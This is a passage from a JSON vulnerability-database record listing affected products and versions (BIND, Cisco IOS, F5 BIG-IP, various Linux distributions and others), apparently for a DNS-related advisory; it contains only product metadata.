            "scope": "eq",
            "trust": 0.3,
            "vendor": "pdnsd",
            "version": "1.2.4"
          },
          {
            "_id": null,
            "model": "rt100i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "networks junose p0-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "6.1.3"
          },
          {
            "_id": null,
            "model": "dns one appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "infoblox",
            "version": "2"
          },
          {
            "_id": null,
            "model": "bind -p1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3.2"
          },
          {
            "_id": null,
            "model": "coat systems proxysg",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "blue",
            "version": "5.2.4.3"
          },
          {
            "_id": null,
            "model": "ios 12.4xd",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks self-service ccxml",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.3.6"
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.12"
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.5.10"
          },
          {
            "_id": null,
            "model": "firepass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "6.0.2"
          },
          {
            "_id": null,
            "model": "windows xp tablet pc edition",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4md",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.2.1.7"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pardus",
            "version": "20080"
          },
          {
            "_id": null,
            "model": "windows server enterprise edition sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "networks self-service peri application",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "network registar",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.0.1"
          },
          {
            "_id": null,
            "model": "linux enterprise sdk 10.sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "suse",
            "version": null
          },
          {
            "_id": null,
            "model": "computing sidewinder software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.2.0.01"
          },
          {
            "_id": null,
            "model": "coat systems ishaper",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "blue",
            "version": "8.3.2"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2007.1"
          },
          {
            "_id": null,
            "model": "matsumoto ruby pre4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.2"
          },
          {
            "_id": null,
            "model": "windows xp professional edition sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "x64"
          },
          {
            "_id": null,
            "model": "nonstop server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6"
          },
          {
            "_id": null,
            "model": "-par",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pdnsd",
            "version": "1.2.1"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.4.2"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "3-dns",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.5.12"
          },
          {
            "_id": null,
            "model": "netware sp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "6.5"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.04"
          },
          {
            "_id": null,
            "model": "netware sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "6.5"
          },
          {
            "_id": null,
            "model": "3-dns",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "computing sidewinder software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.1.1.01"
          },
          {
            "_id": null,
            "model": "netware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "hat enterprise linux desktop client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "5"
          },
          {
            "_id": null,
            "model": "matsumoto ruby -p71",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.7"
          },
          {
            "_id": null,
            "model": "ios 12.3bw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "computing sidewinder software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.0.0.04"
          },
          {
            "_id": null,
            "model": "ios 12.3yf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "iphone",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "matsumoto ruby",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.5"
          },
          {
            "_id": null,
            "model": "computing sidewinder software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "networks junos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "5.6"
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.3.1"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.8"
          },
          {
            "_id": null,
            "model": "ios 12.3yz",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3yg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp professional sp3",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yt",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.6.1"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.6.4"
          },
          {
            "_id": null,
            "model": "ios 12.3t",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xs",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.15"
          },
          {
            "_id": null,
            "model": "open enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "0"
          },
          {
            "_id": null,
            "model": "computing sidewinder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.0.0.01"
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.6.3"
          },
          {
            "_id": null,
            "model": "firepass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "5.5.2"
          },
          {
            "_id": null,
            "model": "bind 9.5.0b1",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2007.1"
          },
          {
            "_id": null,
            "model": "linux lpia",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "bind b1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3.3"
          },
          {
            "_id": null,
            "model": "cns network registrar",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1.1.2"
          },
          {
            "_id": null,
            "model": "netware sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "6.5"
          },
          {
            "_id": null,
            "model": "access gateway standard edition rev a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "4.5.7"
          },
          {
            "_id": null,
            "model": "matsumoto ruby",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.3"
          },
          {
            "_id": null,
            "model": "bind 9.5.0a5",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp tablet pc edition sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "linux enterprise server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "ios 12.4xj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "software vantio",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nominum",
            "version": "3"
          },
          {
            "_id": null,
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "firepass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "12.4(21)"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.5"
          },
          {
            "_id": null,
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.2.5"
          },
          {
            "_id": null,
            "model": "rta50i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "appliance platform linux service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "2"
          },
          {
            "_id": null,
            "model": "ios 12.4xc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "11.0"
          },
          {
            "_id": null,
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.0.2"
          },
          {
            "_id": null,
            "model": "matsumoto ruby -p230",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.5"
          },
          {
            "_id": null,
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.5.11"
          },
          {
            "_id": null,
            "model": "network registar",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.3.1.5"
          },
          {
            "_id": null,
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "networks adonis",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecat",
            "version": "5.0.2.8"
          },
          {
            "_id": null,
            "model": "networks junose p0-7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "7.0.1"
          },
          {
            "_id": null,
            "model": "ipcop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.18"
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.5.13"
          },
          {
            "_id": null,
            "model": "ios 12.2yu",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.2"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.10"
          },
          {
            "_id": null,
            "model": "windows datacenter server sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.2.7"
          },
          {
            "_id": null,
            "model": "windows datacenter server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "rt60w",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.6.2"
          },
          {
            "_id": null,
            "model": "windows xp professional sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "rt57i",
            "scope": null,
            "trust": 0.3,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server itanium sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "windows server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "cns network registrar",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1.1.1"
          },
          {
            "_id": null,
            "model": "bind rc3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.7"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1.3"
          },
          {
            "_id": null,
            "model": "matsumoto ruby -p114",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.6"
          },
          {
            "_id": null,
            "model": "linux lts lpia",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "_id": null,
            "model": "networks ensm enterprise nms",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-10.5"
          },
          {
            "_id": null,
            "model": "rt140p",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.2xk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "matsumoto ruby -p287",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.6"
          },
          {
            "_id": null,
            "model": "messaging application server mm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.3.8"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1.15"
          },
          {
            "_id": null,
            "model": "wanjet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "linux enterprise desktop sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "networks junos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "6.4"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.6"
          },
          {
            "_id": null,
            "model": "computing sidewinder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.2.1.10"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "1.2"
          },
          {
            "_id": null,
            "model": "enterprise linux ws ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "computing sidewinder software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.0.0.02"
          },
          {
            "_id": null,
            "model": "linux m68k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "matsumoto ruby -p2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.5"
          },
          {
            "_id": null,
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "networks junos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "5.7"
          },
          {
            "_id": null,
            "model": "cns network registrar",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1.1.4"
          },
          {
            "_id": null,
            "model": "3-dns",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.5.11"
          },
          {
            "_id": null,
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "bind rc1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3.3"
          },
          {
            "_id": null,
            "model": "bind b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3.3"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.31",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "3,1 rc1",
            "scope": null,
            "trust": 0.3,
            "vendor": "netbsd",
            "version": null
          },
          {
            "_id": null,
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.9"
          },
          {
            "_id": null,
            "model": "networks self-service web centric ccxml",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.5"
          },
          {
            "_id": null,
            "model": "access gateway standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "bind -p1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4.1"
          },
          {
            "_id": null,
            "model": "netware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "6.5"
          },
          {
            "_id": null,
            "model": "dnsmasq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dnsmasq",
            "version": "2.4.1"
          },
          {
            "_id": null,
            "model": "linux hppa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "computing sidewinder software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.2.0.04"
          },
          {
            "_id": null,
            "model": "networks junos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "cns network registrar",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1.1"
          },
          {
            "_id": null,
            "model": "ios 12.3yu",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "10000"
          },
          {
            "_id": null,
            "model": "matsumoto ruby",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.9-2"
          },
          {
            "_id": null,
            "model": "networks junose",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "7.0.2"
          },
          {
            "_id": null,
            "model": "tru64 unix b-4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1.0"
          },
          {
            "_id": null,
            "model": "ios 12.3xa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.4"
          },
          {
            "_id": null,
            "model": "netware sp5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "6.5"
          },
          {
            "_id": null,
            "model": "networks trail manager route advisor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "matsumoto ruby pre2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yukihiro",
            "version": "1.8.2"
          },
          {
            "_id": null,
            "model": "ios 12.4xb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "solaris 9 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 02",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "coat systems director",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "blue",
            "version": "5.2.2.5"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.04"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "1.4.1"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "8.1.1"
          },
          {
            "_id": null,
            "model": "networks junos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "8.4"
          },
          {
            "_id": null,
            "model": "ios 12.4xw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "access gateway advanced edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "windows datacenter server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "netware sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "6.5"
          },
          {
            "_id": null,
            "model": "netware sp7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "6.5"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.7"
          },
          {
            "_id": null,
            "model": "bind b1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "computing sidewinder g2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "6.1.0.01"
          },
          {
            "_id": null,
            "model": "hat enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "4"
          },
          {
            "_id": null,
            "model": "ios 12.4xm",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rt105e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "ios 12.4sw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rt140f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.11"
          },
          {
            "_id": null,
            "model": "firepass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "7.04"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.5"
          },
          {
            "_id": null,
            "model": "ios 12.3yk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "vitalqip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "lucent",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1.4"
          },
          {
            "_id": null,
            "model": "windows professional sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.5.12"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.5"
          },
          {
            "_id": null,
            "model": "rt56v",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "rtv700",
            "scope": null,
            "trust": 0.3,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "netware sp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.5.7"
          },
          {
            "_id": null,
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.0.2"
          },
          {
            "_id": null,
            "model": "computing sidewinder software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "windows xp professional",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.3"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "netware sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "novell",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "bind b2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "bigip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.5"
          },
          {
            "_id": null,
            "model": "networks junose",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "6.0.4"
          },
          {
            "_id": null,
            "model": "ios 12.2xt",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rtw65i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "ios 12.1xc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rt300i",
            "scope": null,
            "trust": 0.3,
